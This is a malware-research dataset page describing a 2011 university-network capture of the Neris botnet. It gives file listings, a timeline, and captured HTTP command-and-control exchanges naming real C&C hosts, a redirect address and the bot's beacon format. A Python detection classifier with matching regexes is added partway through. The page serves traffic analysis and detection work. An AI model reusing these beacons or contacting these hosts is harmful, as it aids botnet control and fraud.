MCFP - ATG - CTU University
Malware Capture Facility Project
CTU-Malware-Capture-Botnet-42

info

  • Binary used: Neris.exe
  • Md5: bf08e6b02e00d2bc6dd493e93e69872f
  • Probable Name: Neris
  • Capture duration: 6.15 hours
  • Complete Pcap size: 52GB
  • Botnet Pcap size: 56MB
  • NetFlow size: 369MB
  • Infected Virtual Environment
      • Windows XP named 'SARUMAN'
      • IP address: 147.32.84.165
      • Label of this IP in the NetFlow files: 'Botnet'

files

pcap files

  • capture20110810.pcap
    This is the main capture file that includes the Background, Normal and Botnet traffic.
  • botnet-capture-20110810-neris.pcap
    This file was obtained at the same time as the capture20110810.pcap file, but capturing only the botnet traffic. The idea is to have a separate file with all the payload that can be published.

netflow files

  • capture20110810.pcap.netflow.labeled (Temporarily broken)
    This file has the unidirectional NetFlows generated by Argus.
  • capture20110810.pcap.netflow.labeled
    This file contains the bidirectional NetFlows generated by Argus.

timeline

  • Wed Aug 10 15:58:00 CEST 2011

We captured the Neris bot along with the packets of the whole CTU department. The first hour of the capture consisted of Background traffic only; after that we ran the malware. The malware was stopped 5 minutes before the end of the capture. We limited the bandwidth of the experiment to 20 kbps on the output of the bot.

traffic analysis

This dataset corresponds to a Neris botnet that ran for 6.15 hours in a university network. The botnet used an HTTP-based C&C channel, not an IRC C&C channel as was erroneously reported before. The actions of the botnet were to communicate using several C&C channels, then to try to send SPAM, to actually send SPAM, and to perform click-fraud using some advertisement services.

The following connection is an example of a real C&C channel that sent only a few flows and is not periodic. This is not a good representative model for C&C connections. An example of the commands sent is:

POST /?c799959d9582d499959791949482d19995939782d2999790969182c699959c949c92959c82c0999582d79995969c959d9d9482c199e79ef8f3edeae0ebf3f7f8f0e1e9f4f893ccddddcccad3c28ac1dcc182c399cdcacdd0a4 HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 10 Aug 2011 09:41:53 GMT
Server: Apache/2.2.8 (Fedora) DAV/2 PHP/5.2.6 mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

CB2=212.117.171.138:65500


The following connection is an unencrypted C&C channel where we can see the commands, and it is a good representative of the C&C connections.

POST /snapbn/gate.php HTTP/1.0
Host: finalcortex.com
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

id=SARUMAN_610d402662842e9f&version=1337&os=2600&s5=6906

HTTP/1.1 200 OK
Date: Wed, 10 Aug 2011 09:08:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 3
Connection: close
Content-Type: text/plain; charset=UTF-8

120
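The two exchanges above are enough to write a first-pass classifier for this C&C traffic. Below is an added example (my own code, not part of the dataset or the project's tools) that parses a raw HTTP request/response pair and flags either the unencrypted gate.php beacon or the CB2 redirect reply; the sample messages are reconstructed from the exchanges quoted on this page, and the finding names and field names are my own choice.

```python
import re

# Constructed sample: the plaintext gate.php beacon quoted on this page, as raw CRLF messages.
SAMPLE_REQUEST = (
    "POST /snapbn/gate.php HTTP/1.0\r\n"
    "Host: finalcortex.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 56\r\n"
    "\r\n"
    "id=SARUMAN_610d402662842e9f&version=1337&os=2600&s5=6906"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Length: 3\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "\r\n"
    "120"
)
# Body shape of the unencrypted beacon: id=<machine>_<16 hex>&version=..&os=..&s5=..
BEACON_RE = re.compile(
    r"^id=(?P<machine>[A-Za-z0-9-]+)_(?P<bot>[0-9a-f]{16})"
    r"&version=(?P<version>\d+)&os=(?P<os>\d+)&s5=(?P<s5>\d+)$")
# Reply shape seen on the first (non-periodic) channel: CB2=<ip>:<port>
CB2_RE = re.compile(r"^CB2=(?P<ip>(?:\d{1,3}\.){3}\d{1,3}):(?P<port>\d{1,5})$")

def split_http(message):
    """Split a raw HTTP message into (start line, lowercase header dict, body)."""
    head, _, body = message.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def classify_exchange(request, response):
    """Return a finding dict for a Neris-style C&C exchange, or None if it matches neither."""
    req_line, req_hdr, req_body = split_http(request)
    _, _, resp_body = split_http(response)
    if not req_line.startswith("POST "):
        return None
    beacon = BEACON_RE.match(req_body)
    if beacon and "form-urlencoded" in req_hdr.get("content-type", ""):
        # The reply is a bare short token (here "120"), not an HTML page: keep it for triage.
        return {"kind": "neris-gate-beacon", "host": req_hdr.get("host", ""),
                "reply": resp_body.strip(), **beacon.groupdict()}
    redirect = CB2_RE.match(resp_body.strip())
    if redirect:  # the server hands the bot its next C&C endpoint: extract it as an indicator
        return {"kind": "neris-cb2-redirect", "next_cc": (redirect["ip"], int(redirect["port"]))}
    return None
```

Run over streams reassembled from botnet-capture-20110810-neris.pcap, the returned dicts give the bot id, reported version and the next C&C endpoint without having to eyeball each flow.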
Download of all the files
